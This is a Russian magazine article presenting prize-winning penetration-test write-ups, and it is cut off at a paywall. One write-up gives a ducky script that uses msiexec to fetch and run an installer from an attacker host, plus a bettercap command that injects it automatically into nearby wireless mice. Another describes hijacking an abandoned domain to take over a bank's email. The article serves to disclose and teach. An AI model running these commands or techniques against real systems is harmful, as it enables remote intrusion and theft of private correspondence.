Содержание статьи
- Четвертое место: «Взлом завода с телефона»
- Выводы
- Третье место: «Пробив одного из крупнейших банков через мобильное приложение»
- Развитие атаки
- Вывод
- Второе место: «Доступ к объекту внутренней сети с использованием NTLM Relay»
- CVE-2022-27228
- Принуждение к аутентификации
- NTLM Relay
- Проведение атаки
- Недостатки и рекомендации по их устранению
- Вывод
Компания Awillix учредила премию, чтобы этичные хакеры смогли громко заявить о себе и рассказать о своих достижениях. Для участия специалисты оставляли заявки с рассказом о своем лучшем проекте, где больше всего проявили смекалку, профессионализм и креатив.
В этой статье собраны райтапы, занявшие четвертое, третье и второе места в номинации «Пробив», а следом отдельной публикацией выйдет работа, взявшая первое место.
Четвертое место: «Взлом завода с телефона»
- Автор: s0i37
В 2020 году я участвовал в комплексном аудите беспроводных сетей на строгом режимном заводе. Мне удалось пробить периметр простым и оригинальным способом. Доступ к рабочему компьютеру сотрудника был получен прямо с улицы, по модели внешнего нарушителя и с использованием мобильного телефона.
На экране телефона можно видеть шелл, открытый на компьютере сотрудника, и приглашение во внутреннюю сеть завода. Этот кейс на 100% демонстрирует реальность атаки внешним нарушителем.
В основе атаки — уязвимость MouseJack, которая позволяет удаленно вводить текст через уязвимые адаптеры беспроводных мышек.
Для эксплуатации на подверженном ПК была набрана команда из следующего ducky-скетча:
GUI r
DELAY 300
STRING msiexec /i https://en.mousejack.attacker.tk/1.msi /quiet
DELAY 300
ENTER
DELAY 300
GUI SPACE
DELAY 300
GUI r
DELAY 300
STRING msiexec /i https://ru.mousejack.attacker.tk/1.msi /quiet
DELAY 300
ENTER
Эта команда работает на любой Windows, даже старой, имеет минимальную длину и за одно действие скачивает и запускает указанный исполняемый файл по HTTP.
Для реального пробива периметра потенциальному злоумышленнику требовалось лишь немного настроить телефон. Нужна автоматическая отправка вредоносных нажатий на каждую вновь найденную беспроводную мышку или клавиатуру. Это можно сделать такой командой:
sudo bettercap -eval "hid.recon on; events.on hid.device.new "hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt;"" 2> /dev/null
Теперь атакующий может убрать телефон в карман и неприметно прогуливаться вдоль периметра, пока ему на виртуалку прилетают шеллы.
Выводы
Позже аналогичным образом мы пробивали периметры очень крупных и известных ИТ‑компаний. И каждый раз это мог быть внешний нарушитель, ничем не выделяющийся из толпы.
Уязвимость работает по радиоканалу, а это накладывает некоторые ограничения на радиус действия. Атаковать цели выше второго этажа сложно. Цели, находящиеся выше, можно атаковать с помощью дрона с прикрепленным к нему Raspberry Pi Zero и Crazyradio.
Эта уязвимость, найденная еще в 2016 году, по‑прежнему актуальна, так как имеет аппаратную природу. По моему мнению, это самая опасная из всех физических уязвимостей сегодня, поскольку она сразу же дает RCE на подверженных устройствах, эксплуатируется за секунду и несложна в эксплуатации.
Более подробно я писал о ней в статьях «Киберфон. Превращаем телефон на Android в инструмент хакера» и «Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок».
Третье место: «Пробив одного из крупнейших банков через мобильное приложение»
- Автор: WizaXxX
Это краткая история о пентесте, который мы проводили по заказу одного из крупных банков. Точкой входа стало мобильное приложение для бизнеса.
Мы заметили, что домен для почты в приложении не совпадает с тем, который указан на сайте. Он вел на адрес в зоне .com, тогда как сайт находится в зоне .ru.
На главной странице домена из российского сегмента видим такое сообщение:
Domain has been assigned.
Please go to the site settings and put the domain name in the Domain tab.
Оно говорит нам о том, что домен направлен на сайт, созданный при помощи конструктора Tilda. Регистрируемся в «Тильде», покупаем самый дешевый тариф и привязываем этот домен к своему сайту.
Смотрим, где хостится почта. Пишем dig и узнаём, что это Яндекс:
somesecret.com. 86400 IN MX 10 mx.yandex.net.
Теперь идем в Яндекс, говорим, что мы владелец домена, и подтверждаем владение через тег на главной странице.
В разделе «Контакты» нашлись предыдущие владельцы электронной почты.
Прежний владелец пытался восстановить пароль на сервисе intercom.io.
Таким образом мы обнаружили всех зарегистрированных пользователей и получили список компаний‑партнеров.
Дальше мы написали простой парсер сообщений, который искал чувствительные данные. Сложно было за что‑то зацепиться среди тысячи переписок. В одной из них нашлась почта, отличная от домена. Да, опять!
Домен уже другой и расположен в зоне .io.
Мы запустили брут поддоменов и нашли IP-адреса, которые ведут в облачные сервисы.
Развитие атаки
При переборе директорий на одном из найденных серверов мы нашли каталог /, отображающий форму входа в «1С:Предприятие».
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
Вариант 2. Открой один материал
Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.
Я уже участник «Xakep.ru»
